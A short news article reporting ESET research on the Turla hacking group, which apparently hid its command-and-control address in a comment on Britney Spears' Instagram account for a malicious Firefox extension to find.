A Russian hacking group has been caught using Britney Spears’ Instagram account to spread malware and communicate with affected computers.
Hackers have been posting coded messages on Britney Spears’ Instagram account believing that such messages won’t be detected by authorities.
Researchers at security research firm ESET have been gracious enough to share a demonstration of how Russian hackers have been communicating via Britney Spears’ Instagram account that commands over 16 million followers. The researchers zeroed in on a Russian hacker group named Turla who have perfected the art over the last three years.
Turla’s ‘watering hole technique’ involves a Firefox extension that redirects website visitors to the group command and control server. The server is then used to communicate with affected computers and inject malware or gain remote access in the process. Turla has been known to attack computers belonging to embassies, governments, government officials and diplomats.
“The extension uses a bit.ly URL to reach its C&C, but the URL path is nowhere to be found in the extension code. In fact, it will obtain this path by using comments posted on a specific Instagram post. The one that was used in the analyzed sample was a comment about a photo posted to the Britney Spears official Instagram account,” said researchers at ESET.
The researchers noted that hackers recently posted a comment on one of Britney Spears’ Instagram posts. The post would seem harmless to the layman but actually, contains a coded custom hash value which hides a link to Turla’s C&C server. Affected computers are programmed to scan for such comments on celebrity Instagram accounts so that a link can be established between such systems and the C&C server.
“The fact that the Turla actors are using social media as a way to obtain its C&C servers is quite interesting. This behavior has already been observed in the past by other threat crews such as the Dukes. Attackers using social media to recover a C&C address are making life harder for defenders,” the researchers said.
“Firstly, it is difficult to distinguish malicious traffic to social media from legitimate traffic. Secondly, it gives the attackers more flexibility when it comes to changing the C&C address as well as erasing all traces of it. It is also interesting to see that they are recycling an old way of fingerprinting a victim and finding new ways to make the C&C retrieval a bit more difficult.”